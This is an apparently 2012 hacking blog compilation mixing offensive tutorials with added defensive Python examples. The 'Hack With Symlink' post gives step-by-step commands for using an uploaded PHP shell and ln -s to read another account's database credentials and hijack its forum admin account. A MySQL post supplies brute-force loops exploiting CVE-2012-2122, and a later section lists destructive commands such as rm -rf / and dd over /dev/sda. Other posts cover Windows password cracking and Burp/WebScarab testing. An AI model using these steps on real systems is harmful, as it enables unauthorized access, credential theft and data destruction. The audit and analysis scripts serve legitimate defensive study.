Friday, 28 September 2012
Hacking Tools
Saturday, 22 September 2012
Hack With Symlink
Hello guys, this article is for beginner web hackers. In this article I'm going to teach you about the symlink technique.
What is symlink?
Symlink is a method used by hackers to read files belonging to other users on a Linux server, using only a PHP shell.
Let me clarify the requirements needed to learn the symlink technique:
Requirements are:
- one PHP shell uploaded on a Linux server (safe_mode = Off)
- basic PHP shell and Linux knowledge
- and last but not least, a brain!
So what are we waiting for? Let's start with the tutorial.
Where do you get a target, if you only have a PHP shell uploaded on a Linux server that hosts some sites?
It's easy: first get the IP of the server.
Then go to bing.com and search like this:
Code: ip:xx.xxx.xxx.xxx vbulletin
Replace xx.xxx.xxx.xxx with the IP address of the server; ‘vbulletin’ can be changed to the name of whichever forum software or CMS you wish to target. For this example I will take vBulletin.
OK, now we got the target site, let’s suppose that its domain name is mytarget.com and it uses vBulletin forum software.
Now starts the real hacking!
Go to your PHP shell and, in the ‘Execute command’ field, execute this command:
Code: ls -la /etc/valiases/mytarget.com
By executing this command, I will get the name of the user (on the Linux server) that owns the website mytarget.com.
It should return a result similar to this:
-rw-r--r-- 1 target mail 28 May 28 2011 /etc/valiases/mytarget.com
The third column (shown in red in the original post) is the user of mytarget.com on the server.
So in our case the username is ‘target’.
Many of us know that the configuration file of the vBulletin script can be found in /includes/config.php.
This is the file we need to read in our case, in order to get access to our target site.
How can we read that file?
Simple, execute this command in the shell:
Code: ln -s /home/target/public_html/includes/config.php symlink.txt
As you can see, we're linking the content of config.php into the symlink.txt file. After you execute the command, you will see a new file called symlink.txt. Open it and you have successfully read the configuration file (via the symlink). Now, just get a MySQL connector script coded in PHP and log in with the details you got from the configuration file of your target. Then, in the admin table, get the admin's hash and crack it, or better, change the admin's email to yours and then do a forgot-password request at mytarget.com. You will then have full access to your target site!
That was all; it's very easy. All you need is to practice it many times.
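For the server administrator on the other side of this tutorial, the artefact to look for is a symlink inside one account's web root whose target resolves outside it (here, another account's config.php). The following audit script is an added example, not code from the original post; the demo tree it builds under a temporary directory is constructed, and the function and file names are my own.

```python
"""Audit a web root for symlinks that resolve outside it.

Added example, not part of the original post: the tutorial above creates a
link inside one account's public_html that points at another account's
config.php. This script lists such links so a server admin can find them.
The tree built in build_demo_tree() is constructed here, not real data.
"""
import os
import tempfile


def find_escaping_symlinks(web_root):
    """Return [(link_path, resolved_target)] for every symlink under web_root
    whose target lies outside web_root. Symlinked directories are reported
    but not descended into (os.walk does not follow links by default)."""
    root = os.path.realpath(web_root)
    found = []
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            path = os.path.join(dirpath, name)
            if not os.path.islink(path):
                continue
            # realpath follows the whole chain; a dangling link still yields a path.
            target = os.path.realpath(path)
            if os.path.commonpath([root, target]) != root:
                found.append((path, target))
    return found


def cross_owner(link_path, target):
    """True when the link's owner differs from the target's owner, which is
    the pattern of the cross-account read described above. False when the
    target does not exist."""
    try:
        return os.lstat(link_path).st_uid != os.stat(target).st_uid
    except FileNotFoundError:
        return False


def build_demo_tree():
    """Constructed sample: web/ with one in-tree link and one escaping link."""
    base = tempfile.mkdtemp(prefix="symlink-audit-")
    web = os.path.join(base, "web")
    other = os.path.join(base, "other", "public_html", "includes")
    os.makedirs(os.path.join(web, "includes"))
    os.makedirs(other)
    for path in (os.path.join(web, "includes", "config.php"),
                 os.path.join(other, "config.php")):
        with open(path, "w") as fh:
            fh.write("<?php // constructed placeholder\n")
    os.symlink(os.path.join(web, "includes", "config.php"),
               os.path.join(web, "inside.txt"))      # stays inside web/
    os.symlink(os.path.join(other, "config.php"),
               os.path.join(web, "symlink.txt"))     # escapes web/
    return web


def demo():
    """Run the audit on the constructed tree; returns the escaping link names."""
    web = build_demo_tree()
    return sorted(os.path.basename(link) for link, _ in find_escaping_symlinks(web))


if __name__ == "__main__":
    web = build_demo_tree()
    for link, target in find_escaping_symlinks(web):
        flag = " (different owner)" if cross_owner(link, target) else ""
        print(f"{link} -> {target}{flag}")
```

Run it against a real account's public_html instead of the demo tree to list links that leave that directory; links flagged with a different owner are the ones worth investigating first.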
Sunday, 16 September 2012
MySQL 1 Liner Hack Gives Root Access Without Password
The latest news that has hit the streets is the occurrence of the easiest hack ever: if you have local shell access (at any user privilege level) and you can connect to MySQL, you can get root access to MySQL within a few seconds. I tried this yesterday on one of my servers on Ubuntu 12.04 running the latest version of MySQL in the repo, and it worked in about 30 seconds. Scary really; you can use this single line of bash to hack MySQL:
Code: while [ 1 ];do mysql -u root --password=123; done
The same loop in Python:
Code:
#!/usr/bin/python
import subprocess
while 1:
    subprocess.Popen("mysql -u root mysql --password=blah", shell=True).wait()
Security experts have identified some 879,046 servers vulnerable to a brute force flaw that undermines password controls in MySQL and MariaDB systems. There are a lot of vulnerable servers out there, so you had better hope they aren't yours, because it's not hard to scan whole subnets for servers with port 3306 open that accept connections from the outside world.
According to Rapid7 security chief HD Moore, one in every 256 brute force attempts could override authentication controls on the servers and allow any password combination to be accepted. An attacker only needed to know a legitimate username which in most circumstances included the name ‘root’.
The flaw has already been exploited. Moore reported that the flaw (CVE-2012-2122) was already patched for both MySQL and MariaDB, but many MySQL administrators had not fixed the hole in their deployments.
Upon scanning 1.7 million publicly exposed MySQL servers, he found more than half (879,046) vulnerable to the “tragically comedic” flaw.
And if your server is in that state, it's vulnerable. I just checked the repos for Ubuntu 10.04 LTS and Ubuntu 12.04 LTS and they both have a patched version of MySQL available for download, so I suggest you get on your servers and run:
Code: aptitude update; aptitude safe-upgrade
Affected versions, listed below, require memcmp() to return an arbitrary integer outside of the range -128 to 127. All MariaDB and MySQL versions up to 5.1.61, 5.2.11, 5.3.5 and 5.5.22 were vulnerable, Golubchik said. Honestly, I find that this is a really serious vulnerability, but one with a pretty low risk profile. It will only work in cases of badly configured MySQL users that accept connections from any IP address (user@% type entries in the user table).
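The memcmp() detail above is the whole bug: memcmp() returns an int, but the vulnerable builds kept the result of the hash comparison in a one-byte type, so any result that is a multiple of 256 looks like 0 ("hashes match"). The model below is an added example in plain Python, not MySQL's code; the function names and the sample range of memcmp() results are my own.

```python
"""Why CVE-2012-2122 passes about one login attempt in 256.

Added example, not code from the original post or from MySQL: it models the
flawed comparison in pure Python. memcmp() returns an int, but the
vulnerable builds narrowed the comparison result to a one-byte type, so only
the low byte survived. A memcmp() result such as 256 or -512 then compares
equal to 0, i.e. "password hashes match".
"""


def to_c_char(value: int) -> int:
    """Truncate an int to a signed 8-bit C char (two's complement)."""
    low = value & 0xFF
    return low - 256 if low > 127 else low


def vulnerable_check(memcmp_result: int) -> bool:
    """Flawed pattern: the comparison result is narrowed to one byte before
    being tested for zero. Returns True when the login would be accepted."""
    return to_c_char(memcmp_result) == 0


def fixed_check(memcmp_result: int) -> bool:
    """Correct pattern: test the full int that memcmp() returned."""
    return memcmp_result == 0


def accepted_count(check, results) -> int:
    """How many of the given memcmp() results the check would accept."""
    return sum(1 for r in results if check(r))


def acceptance_rate(check, results) -> float:
    """Fraction of the given memcmp() results the check would accept."""
    results = list(results)
    return accepted_count(check, results) / len(results)


if __name__ == "__main__":
    # memcmp() only promises the sign of its result; an implementation that
    # returns scaled byte differences (e.g. 256, -512) triggers the flaw.
    # The range below is a constructed sample of possible return values.
    sample = range(-1024, 1024)
    print("vulnerable accepts", accepted_count(vulnerable_check, sample),
          "of", len(sample))
    print("fixed accepts", accepted_count(fixed_check, sample),
          "of", len(sample))
```

Over the constructed sample the flawed check accepts 8 of 2048 results (exactly 1/256, the figure quoted above) while the correct check accepts only the genuine match.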
Moore and other security boffins identified vulnerable versions in Ubuntu 64-bit versions 10.04, 10.10, 11.04, 11.10, and 12.04, OpenSUSE 12.1 64-bit MySQL 5.5.23, and Fedora. Official builds of MariaDB and MySQL were safe, along with Red Hat Enterprise Linux 4, 5 and 6 and some flavours of Debian Linux and Gentoo 64 bit.
A list of accessible MySQL servers found 356,000 deployments running versions of 5.0.x, followed by 285,000 running 5.1.x, and 134,436 running 5.5.x. Another list of MySQL build flavours revealed 43,900 running Ubuntu, 6408 on Debian, and 98,665 on Windows.
NO ONE should be running root@% – so that would mean the attacker would need local shell access. And well if they have that, it’s pretty much game over anyway.
Windows XML Core Services Exploit Attacked In The Wild – CVE-2012-1889
Oh look, another serious flaw in Windows, and this one is really bad because it can be exploited directly in Internet Explorer. And even worse than that, this vulnerability is actually being exploited in the wild by cybercriminals, which shows it's no longer a theoretical attack. Plus, of course, the fact that it's actually unpatched, so even if you've applied all the available Windows updates it's still exploitable.
An unpatched Windows vulnerability considered a critical threat by security experts is being exploited by cybercriminals. This is a serious issue; even when it gets patched it'll still be a serious issue, as people and companies tend to be slow in applying patches, and quite often people turn off Windows Update entirely because they find it annoying and the updates quite often cause more problems than they solve (black screen of death, etc.).
Microsoft disclosed the flaw in XML Core Services (MSXML) 3.0, 4.0 and 6.0 June 12 during its monthly release of patches. The security advisory, which was separate from the patch release, offered a workaround for vulnerability CVE-2012-1889, but no fix. The vulnerability is easily exploited through Internet Explorer.
Security vendor Sophos reported Tuesday that it discovered over the weekend a web page crafted to take advantage of the flaw. The page was on the site of an unidentified European medical company, which did not know its website had been hijacked, Sophos said.
Cybercriminals often hide malware on legitimate websites for so-called drive-by installs. To lure people to the compromised site, hackers typically use specially crafted email to entice recipients to click on a link to the infected page.
Marcus Carey, a security researcher at Rapid7, said his company was sure cybercriminals everywhere were exploiting the widely known vulnerability. “That vulnerability is definitely being exploited in the wild,” he said Wednesday. Unpatched software flaws that are disclosed publicly become priority No. 1 for cyber-criminals, who know that companies and people are slow to install patches, and even slower to apply workarounds.
Plus the fact that it’s easily exploitable in the browser, this is not a complex multi-layered attack or something that needs network exposure to work.
A lot of anti-virus software vendors have issued updates that detect this exploit and will help mitigate against the threat until a proper patch is issued by Microsoft.
The latest vulnerability is particularly serious because it can be easily exploited. “The only thing you have to do is visit a website that’s been compromised, and you’re going to compromise your system,” Carey said. “Anyone running Internet Explorer should be terrified unless they apply the [Microsoft] fix-it.” The vulnerability notation for this is CVE-2012-1889, if you want to keep tabs on what’s going on with it.
MSXML is a set of services used in building Windows-native XML-based applications. The latest flaw affects all releases of Windows and Office 2003 and 2007. A successful attacker could use the vulnerability to gain full user rights to a PC, Microsoft said.
Until a patch is released, the Microsoft workaround is the only way to stymie hackers. Many security vendors have updated their products to detect malicious code that tries to exploit the vulnerability. “Although security software can protect against this vulnerability, let’s hope that Microsoft can release a proper patch sooner rather than later,” Paul Baccas, senior threat researcher at Sophos, said in the company’s blog.
Google reported the vulnerability to Microsoft on May 30 and worked with the software maker.
Tuesday, 11 September 2012
How to Hack a Password on Windows 7 with Software
Believe it or not, no matter whether you’ve forgotten the password for a Windows XP, Vista or even Windows 7 system, there are easy ways to get it back again. The problem is how? You may think of “hack”. Well, indeed, this article will show you how to hack a Windows 7 password when you have forgotten or lost it. However, what I will show you, ways to crack a lost Windows 7 computer password, are all legal; they are not the illegal “hack” you may be thinking of. If you are doubtful or don’t believe it, just read over the passage and you will be persuaded.
Hack password for Windows 7 with professional third-party password recovery utility.
We all know that if you forget your computer password, Microsoft won’t offer you a related service to solve the problem. Well, this really gives promising marketing chances to many software providers, who provide professional third-party password recovery applications. I cannot promise all of the third-party password recovery applications are good ones; however, if I had to choose, I would trust Windows Password Recovery Professional. No bugs, no potential safety hazard, clean, easy to use, instant password recovery, etc.: those are all good traits of the utility. Interested in it? Then let’s have a careful look at it!
Guide on how to crack Windows 7 password with Windows Password Recovery Professional.
Step1: Download Windows Password Recovery Professional from SmartKey website.
Step2: Install and launch it to any accessible computer.
Step3: Use a blank and writable CD/DVD/USB to burn Windows 7 password reset disk with the tool.
Step4: Boot the locked computer from CD/DVD/USB.
Step5: Start to remove Windows 7 password with the burned disk.
Step6: Reboot computer and login to the locked PC without password.
No matter how complicated or how long your Windows 7 password is, this application—Windows Password Recovery Professional will instantly hack it within one minute! Only one minute later, you can regain access to your PC without limitation!
Change Windows 7 password with freeware—Ophcrack.
Ophcrack is an open source and free program that bypasses Windows passwords by cracking LM hashes with rainbow tables. The Ophcrack Windows password reset is by far the fastest free Windows 7 password hacker tool available.
While compared with other professional Windows password recovery software, of course, Ophcrack, as a freeware, has some limitations. In the test on my Win 7 PC, Ophcrack can recover at most a 10-character password to my administrator account. Well, for the purpose of safety, I do recommend you to use a professional Windows password recovery tool.
Monday, 10 September 2012
Web Scarab 2: Proxy
In this tutorial I’ll tell you about some basics of the HTTP proxy in WebScarab. An HTTP proxy is very useful when you have to do a vulnerability assessment of a web application: it allows you to record the whole request data packet and response data packet, and after that you can analyze the incoming and outgoing data through the HTTP proxy.
In this tutorial we basically focus on WebScarab, although there are numerous tools on the market (e.g. Paros, Burp, etc.). First of all you have to start WebScarab; by default the listening port is 8008, but you can change it. The other settings you have to make are shown below:
We’ll also need to configure our browser so that our communication is pointed through the proxy. In recent versions of Firefox the path should be Tools >> Options >> Advanced Tab >> Network Tab >> Settings. Once there you’ll need to highlight “Manual proxy configuration”, then for “HTTP Proxy” type in “localhost” and for port use 8008. You’ll also need to do this for the SSL proxy if the web application uses SSL, as shown in fig:
This tutorial is going to show how WebScarab can walk through a web application provided by Foundstone. The following figure shows the login page for this application.
I have already created an account within the application with the username “hacker” and a password of “passwd”. So with WebScarab already running in the background I am going to log in to facebook. If you are on the Summary tab within WebScarab you will notice requests and responses filling up rows in the bottom pane. WebScarab is logging all communication between you and the web server; this includes all images, CSS files, JavaScript files, parameters, etc. The top pane of the Summary tab shows you a directory structure of your history through the web application. This Summary tab can be seen in the figure.
Webscarab Summary Tab
Now a summary of your history is neat but that only scratches the surface of WebScarab’s functionality. One of the best functions of an HTTP proxy is the ability to intercept requests on the fly or replay those requests at a later time. In order to intercept requests / responses make sure you have checked the “Intercept requests” / “Intercept responses” checkboxes in the Proxy >> Manual Edit tab. These settings can be seen in the figure.
Webscarab Intercept Settings
You may be wondering why you would want to intercept or repeat an HTTP request / response. The simple answer is to learn more about what a website is doing with your input (e.g. SSN, credit card, personal information). Application security folks, developers, or curious people may want to understand more about the web application they’re using. Intercepting a request / response will allow you to see and manipulate communication being sent back and forth. Application security analysts like to replay requests over and over again with different inputs to see what the application will allow as input. This will give security analysts an idea of how secure the application is. Had we intercepted the login process you would have seen the inputs for username and password being sent to the web server. A screen shot of this can be seen in the figure.
You can see in the figure that WebScarab has intercepted both the username “hacker” and password “passwd”. An HTTP proxy is able to see the password even though each character was replaced by an asterisk within the application. At this point you could accept the request or manipulate the parameters. You could try to log in as someone else at this point even though you initially typed in a different username and password. With an HTTP proxy you could manipulate any request / response, not just the login process.
WebScarab 3: Session ID Analysis
In this tutorial we focus on session ID analysis. If you are not familiar with session IDs I’ll do a quick explanation. HTTP is a stateless protocol, so it’s equivalent to walkie talkies or CB radios. You’ll send a request and wait for a reply; you don’t have a constantly open communication line as you would with a phone. So in order to emulate this open communication the HTTP protocol uses session IDs, commonly known as cookies. These cookies are simply agreements between you and the web application that you are who you claim to be. Once you have exchanged your cookie with the website you can then talk back and forth as long as the cookie is tied to your communication. So there’s the quick and dirty intro to session IDs. So the next logical question is how does this session ID process work, or even better, how should it work? Let’s use a web mail application as an example:
- You login to your web mail account
- Your web mail provider sends you a “random” cookie that is tied to your login session
- Each time you click on a new message within your Inbox your cookie is sent along to validate who you claim to be, that way you’ll get your next message and not another person’s message.
These are the basic steps. The main thing to remember is that your login credentials are tied to the session ID / cookie. So the key to keeping your conversations private is protecting the session ID and making it hard to guess. Session IDs are similar to passwords in that regard: you always want to keep them a secret and make them hard to guess. When WebScarab analyzes the session ID it only focuses on whether the session is easy or hard to guess (aka randomness). So enough with the chit chat, let’s see how WebScarab analyzes session IDs.
Once again we’re going to be analyzing the login web application. The login page for this application can be seen in Fig.
Login page
So with WebScarab already running in the background I’ll go ahead and log in and click on a few links. Navigating inside the application will generate requests and responses that we can later analyze. Now the login process should generate a session ID but there could be other session IDs generated within the application that you may want to analyze as well. You could always keep an eye on the Summary tab to see if you are capturing cookies. There are other ways to maintain state within a web application but cookies are the most common. When looking at the Summary tab for the login process you can see that cookies are being set. This can be seen in the first conversation in the bottom row of the figure.
Login process of login page
So the conversation with the path /account/login is setting a cookie; also the top pane has a check mark indicating that the login URL is setting a cookie as well. This is definitely a good target because we know the functionality of this session ID is to maintain my balance and gambling stats. Some session IDs can be tough to figure out and sometimes it seems like developers set cookies for no reason. So now let’s walk through the steps to analyze the session ID associated with /account/login.
- Log out of the current session. I can’t stress this enough, the first time I was using this feature I bumbled around for a couple of hours trying to figure out why it wasn’t analyzing the sessions. Further down in this article I’ll show you a screen shot of what it looks like when you try and analyze the session you are currently logged into.
- Navigate to the Session ID Analysis tab >> Collection tab within Webscarab. There you will see a drop down list labeled “Previous Requests”, here you can pick a conversation from your history of transactions within the web application to analyze. We already know that we want to analyze the /account/login conversation because we saw that it was setting cookies. If you were unsure which conversation used session ID’s you could click on the “Test” button to verify if session information existed. Fig shows a screen shot of me choosing the /account/login conversation for analysis.
Choosing conversation in Collection tab
- After you have chosen your conversation for analysis you will then click on the “Fetch” button to start collecting session IDs from the web server. The default number of session IDs collected is set at 100 but you can choose more if you like. My background is math and science so I’m of the opinion that you can never have too many data points. Play with this number if you like; in my experience more samples will do a better job at producing trends and pointing out weaknesses in random number generation. The law of diminishing returns will eventually kick in though. So after you have clicked the “Fetch” button you will need to move over to the “Analysis” tab. When you first click on the “Analysis” tab it may seem like nothing is happening; this is because you need to select your session ID from the “Session Identifier” drop down list. This drop down list can be seen in the figure.
Choosing session in Analysis tab
Once you have selected the session that you are analyzing, the table should begin to populate with the number of samples that you chose in the Collection tab. WebScarab takes the session IDs found within the web application and converts them into numbers so that they can be easily parsed. These numbers are then compared to one another for predictability. The figure below shows what happens when you try to analyze the current session: you’ll get zeros for both the Numeric value and the Difference. This is because the session ID / cookie stays the same.
Analyzing current session
- The fourth and final step is the neatest part of the session ID analysis functionality within WebScarab, the Visualization tab. This tab creates a graph using the numbers from the Analysis tab. This will give you a quick visual representation of how weak or strong the session IDs are. The graphical analysis of the Hacme Casino session IDs can be seen below in the figure.
Cookies over time for login page
It appears that the session IDs created for the login page are random or at the very least not easy to guess. Your average malicious user is going to see that the session IDs are going to be difficult to guess, so they’ll move on and try another vector to get inside the web application. A malicious user will be looking for easy access so they will be looking for session IDs that are very easy to guess. The figure shows an application that implements session IDs that are very easy to guess.
Weak cookies over time
This graph was not generated using Foundstone’s login, but had a malicious user seen this type of graph it would be very easy for them to guess a session ID and essentially hijack that person’s login account. From the casino example you can see how dangerous weak session IDs can be. Session IDs are the “key” to someone’s account information. This is possible due to the stateless nature of HTTP. So a malicious user could hijack your account without ever knowing your username or password.
Burp Suite 5: Sequencer | Comparer | Decoder
Burp Sequencer
The Burp Sequencer tool is used to check for the extent of randomness in the session tokens generated by the Web application. Brute force attacks enumerate every possible combination for gaining authentication from the Web application. Thus it is important to have a high degree of randomness in the session token IDs. For this Burp Suite training tutorial, let us start with sending a request that contains a session token.
Token request using sequencer
Figure 1 shows a token request to the website google.com. The right side of the screenshot has the token start and token end expressions. You can either specify an expression such as “Google” or even set the offset from where the token has to start. This also applies to the token end panel, where you can set the delimiter, or specify a fixed length for the capture to start. After fixing these parameters, click START CAPTURE.
Start capture action panel
The start capture action panel is depicted in Figure 2. It sends requests to the target and gives a detailed analysis of the randomness in the cookie tokens. You can pause or stop the analysis at any point. For this Burp Suite training tutorial, stop the scan midway and check out the results. The screenshot in Figure 3 explains the results better.
Token randomness analysis results
The scan components are as follows:
- Overall result
- Effective entropy
- Reliability
- Sample size
For this Burp Suite training tutorial, let us look at the following options provided by Burp sequencer. None of these is compulsory for analysis and they can be chosen or dropped as desired.
1. Character count analysis
This test analyzes the distribution of characters used within each token.
2. Character transition analysis
This test analyzes the transitions between characters in successive tokens. Depending on the randomness of the characters, the transition statistics vary.
3. FIPS monobit test
This test counts the 0s and 1s at each bit position. If the generator is random, the two counts should be approximately equal.
4. FIPS poker test
This divides the bit sequence into consecutive, non-overlapping groups of four bits. The distribution of the resulting values is evaluated with a chi-square calculation.
5. FIPS runs test
As the name suggests, the bit sequence is divided into runs of consecutive bits with the same value, and the number of runs of each length is evaluated.
6. FIPS long runs test
Similar to the FIPS runs test, this test looks at the longest run of consecutive bits with the same value.
7. Spectral tests
This is an advanced method with complex statistical analysis. It treats a bit sequence as a point in multidimensional space and analyzes the resulting distribution.
8. Correlation test
The tests described thus far analyze each bit position in isolation. The correlation test combines these isolated results and evaluates the bits as a whole.
9. Compression test
This test works on the principle of the standard ZLIB compression technique. The bit sequences are compressed and the degree of compression is calculated. A higher degree of compression translates to a lower degree of randomness.
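To make the tests above concrete, here is an added example (not from this tutorial and not Burp Suite's code) that runs simplified monobit, runs, long-runs, compression and character-count checks over two constructed token samples: a sequential counter rendered as a 128-bit hex string, and tokens from the OS CSPRNG. The 34-bit long-run limit is the FIPS 140-1 value; the other thresholds are illustrative choices of mine, and hex-encoded tokens are assumed.

```python
import os
import zlib

LONG_RUN_LIMIT = 34   # FIPS 140-1 fails a 20,000-bit sample containing any run this long


def sequential_tokens(n, start=1000):
    """Constructed weak tokens: a counter rendered as a 128-bit hex string."""
    return [f"{start + i:032x}" for i in range(n)]


def random_tokens(n):
    """Tokens from the OS CSPRNG, 128 bits each, for comparison."""
    return [os.urandom(16).hex() for _ in range(n)]


def token_bytes(tokens):
    """Decode hex tokens to raw bytes so the bit tests see the real entropy,
    not the fixed high bits of ASCII hex digits (assumes hex-encoded tokens)."""
    return b"".join(bytes.fromhex(t) for t in tokens)


def to_bits(data):
    """Render bytes as a string of '0'/'1' characters."""
    return "".join(f"{b:08b}" for b in data)


def monobit(bits):
    """Fraction of 1 bits; about 0.5 for random data (FIPS monobit)."""
    return bits.count("1") / len(bits)


def run_count(bits):
    """Number of runs of identical bits; about len(bits)/2 if random (FIPS runs)."""
    return 1 + sum(1 for a, b in zip(bits, bits[1:]) if a != b)


def longest_run(bits):
    """Longest run of identical consecutive bits (FIPS long runs)."""
    best = cur = 1
    for a, b in zip(bits, bits[1:]):
        cur = cur + 1 if a == b else 1
        best = max(best, cur)
    return best


def compression_ratio(data):
    """compressed/original size: near 1.0 means incompressible (random); well
    below 1.0 means structure a guesser could exploit (compression test)."""
    return len(zlib.compress(data, 9)) / len(data)


def fixed_positions(tokens):
    """Character count analysis: token positions that never change and so
    contribute no entropy at all."""
    width = min(len(t) for t in tokens)
    return sum(1 for i in range(width) if len({t[i] for t in tokens}) == 1)


def assess(tokens):
    """Run all checks over a token sample and give a simple verdict."""
    data = token_bytes(tokens)
    bits = to_bits(data)
    r = {"monobit": monobit(bits), "runs": run_count(bits),
         "longest_run": longest_run(bits),
         "compression": compression_ratio(data),
         "fixed_positions": fixed_positions(tokens)}
    weak = (abs(r["monobit"] - 0.5) > 0.05 or r["longest_run"] >= LONG_RUN_LIMIT
            or r["compression"] < 0.9 or r["fixed_positions"] > 0)
    r["verdict"] = "weak" if weak else "no obvious weakness"
    return r


if __name__ == "__main__":
    print("sequential:", assess(sequential_tokens(200)))
    print("random:    ", assess(random_tokens(200)))
```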
Burp Decoder
The Burp Decoder tool works on data sent to it from the other Burp tools. Within the decoder there are options to encode the data in various formats such as Base64, URL encoding, and so on, and options to transform it into hashes such as MD5 or SHA-1.
Burp Decoder
Figure 4 depicts a Burp Decoder request. For our Burp Suite training
tutorial, consider an encoded request such as the one shown in Figure 5.
The upper portion shows a request encoded in the base64 format while
the lower one depicts the request decoded into plain text. While the
entire request has been encoded here, you could also selectively choose a
portion of the request to decode/encode.
Encoded Request
This tool is useful when the username and password are encrypted or encoded client-side with commonly used hashes or encoders. The username or password field can be selectively decoded and the content then viewed in plaintext.
Burp Comparer
Burp Comparer is used for comparisons between two sets of data. For instance, the two sets could display responses to two different requests. The comparison can be performed either on a word scale (word by word) or bit by bit. Burp automates this process for the user and compares the two requests or responses accordingly. For this Burp Suite training tutorial, the comparison shown in Figure 6 is of two different requests to a website.
Comparison of requests to a website
This ends the Burp Suite training tutorial series. The extent to which Burp Suite can be used is limited only by the imagination of the user.
Saturday, 8 September 2012
Security Issues With FTP
FTP, the file transfer protocol, is widely used on the Internet for transferring files. Though FTP has a terrible security record, it continues to be very popular, mainly because it is so simple to set up and use. There is a great deal of FTP software available.
WU-FTPD, the Washington University FTP daemon, has been a popular choice with many recently because it provides these security features that have been lacking in some other options in the past:
- log all incoming and outgoing file transfers
- log all commands used by users
- compression on the fly
- organize users into classes so that limits can be applied per class
- control uploads on each directory individually
- display messages
- support virtual hosts
ProFTPD has been configured and designed to be more secure than WU-FTPD. ProFTPD was rewritten from scratch to provide greater security. The security features that it provides are:
- directory access control using .ftpaccess files
- anonymous FTP root directory
- support for hidden files
- self-contained
- uses an unprivileged user in stand-alone mode
Both of these FTP servers are widely used. However, CentOS uses an FTP program that offers greater security and scalability, VSFTPD.
VSFTP
VSFTPD has replaced WU-FTPD with a more secure FTP daemon. This FTP program is described as more secure, stable, faster and more scalable. VSFTPD takes steps to minimize the privileges it needs to run the FTP program. Each user runs at the level of least privilege.
Check out the website to see speed and security comparisons: http://vsftpd.beasts.org/
An example of what VSFTPD is trying to eliminate is WU-FTPD’s behaviour: when you log in as an anonymous user with WU-FTPD, a process is run for the FTP session, and that process must run as root on the remote machine. This does not occur with VSFTPD.
VSFTPD uses chroot, which minimizes the damage if a user does compromise the server.
Secure Design:
1. Parsing and acting on potentially malicious remote network data is done in an unprivileged user process. In addition, a chroot() jail is used to ensure only the FTP files are accessible.
2. Privileged operations are done by a privileged parent process.
3. All requests received by the parent process are distrusted.
4. The privileged parent process uses capabilities and chroot() to always run as the least privileged user possible. The privileged parent constantly calculates the privileges it needs.
Buffer Overflow:
Buffer overflow problems have been the source of many security issues, and systems can be compromised by them. vsftpd uses an API to hide the buffer handling from the rest of the code, and one piece of generic code deals with all buffer handling, for simplicity.
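The secure design points above can be modelled in a few lines. This added example is not vsftpd's code: it is a toy privilege-separated broker in which an unprivileged worker parses the untrusted command line and may only ask the privileged parent for a fixed set of operations, and the parent distrusts every request and re-checks the path against the FTP root (the check a chroot jail would enforce). All names are hypothetical and the FTP root is a constructed temporary directory.

```python
import os
import tempfile

ALLOWED_OPS = {"RETR"}   # the parent honours only this allow-list


def parse_command(line):
    """Worker side: parse one FTP command line from the network. This input is
    untrusted, which is why vsftpd runs this stage in an unprivileged,
    chrooted process: a parser bug yields only that process's rights."""
    parts = line.strip().split(" ", 1)
    op = parts[0].upper()
    arg = parts[1] if len(parts) > 1 else ""
    return op, arg


def inside_root(root, requested):
    """Resolve `requested` relative to `root` and confirm it cannot escape
    root, whether via '..' or via a symlink. Returns the real path or None."""
    real_root = os.path.realpath(root)
    target = os.path.realpath(os.path.join(real_root, requested.lstrip("/")))
    if target == real_root or target.startswith(real_root + os.sep):
        return target
    return None


def privileged_parent(root, op, arg):
    """Parent side: every request from the worker is treated as hostile
    (design point 3), so the op and the path are re-checked here rather than
    trusted because the worker already parsed them."""
    if op not in ALLOWED_OPS:
        return ("ERR", "operation not permitted")
    path = inside_root(root, arg)
    if path is None or not os.path.isfile(path):
        return ("ERR", "path outside FTP root or not a regular file")
    with open(path, "rb") as fh:          # the single privileged action
        return ("OK", fh.read())


def handle_line(root, line):
    """One command end to end: the worker parses, the parent decides."""
    op, arg = parse_command(line)
    return privileged_parent(root, op, arg)


def make_demo_root():
    """Constructed FTP root: one public file and a symlink pointing at '/'
    (the kind of escape a chroot jail, or this check, must stop)."""
    root = tempfile.mkdtemp(prefix="ftproot-")
    with open(os.path.join(root, "readme.txt"), "w") as fh:
        fh.write("public file\n")
    os.symlink(os.sep, os.path.join(root, "escape"))
    return root


if __name__ == "__main__":
    demo = make_demo_root()
    for cmd in ["RETR readme.txt", "RETR ../../etc/passwd",
                "RETR escape", "DELE readme.txt"]:
        print(cmd, "->", handle_line(demo, cmd))
```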
How to crash Linux?
As root, you can do whatever you want.
Try this command, as root (reconsider if you really want to crash):
# cp /dev/zero /dev/mem
As root, you can even erase all the files on your system with a similarly innocuous-looking one-liner (don’t do it):
# rm -rf /
This is not to say that Linux is easy to crash, but that the system administrator (“root”) has complete power over the system, so think before you act when working on Linux as the “root” user.
Wipe hard disk completely in Linux
Steps to Wipe the Hard Drive Completely
As we all know, mkfs doesn’t erase a lot. mkfs and its variants (e.g., mkfs.ext3 and mke2fs) only get rid of a few important data structures on the filesystem, but the data is still there! For a SCSI disk connected as /dev/sda, a quick
dd if=/dev/sda | strings
will let anyone recover text data from a supposedly erased hard drive. Binary data is more complicated to retrieve, but the same basic principle applies: the data was not completely erased.
To make things harder for the bad guys, an old trick was to use the ‘dd’ command as a way to erase a drive.
Note: This command will erase your disk!
dd if=/dev/zero of=/dev/sda
There’s one problem with this: newer, more advanced techniques make it possible to retrieve data that was replaced with a bunch of 0s. To make it more difficult, if not impossible, for the bad guys to read data that was previously stored on a disk, Red Hat ships the “shred” utility as part of the coreutils RPM package. Launching “shred” on a disk or a partition will write repeatedly (25 times by default) to all locations on the disk.
Note: Be careful with this one too!
shred /dev/sda
This is currently known to be a very safe way to delete data from a
hard drive before, let’s say, you ship it back to the manufacturer for
repair.
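The difference between mkfs, dd and shred described above can be demonstrated safely on a file-backed image instead of a real device. This added example (not from the original post) constructs a small "disk" whose metadata occupies the first block and whose data area holds a secret, then models mkfs as rewriting only the metadata block, dd if=/dev/zero as one zero pass, and shred as several random passes followed by a zero pass; a strings-style scan shows what each leaves behind. Names and the image layout are hypothetical, and the shred pass count is a parameter (the post quotes 25 as the default).

```python
import os
import re
import tempfile

BLOCK = 4096              # size of the "metadata" block that mkfs rewrites
IMAGE_SIZE = 16 * BLOCK   # constructed disk image: 64 KiB


def make_disk_image(secret):
    """Create a disk image: metadata block, random filler, then a file
    whose contents include `secret` (bytes). Returns the image path."""
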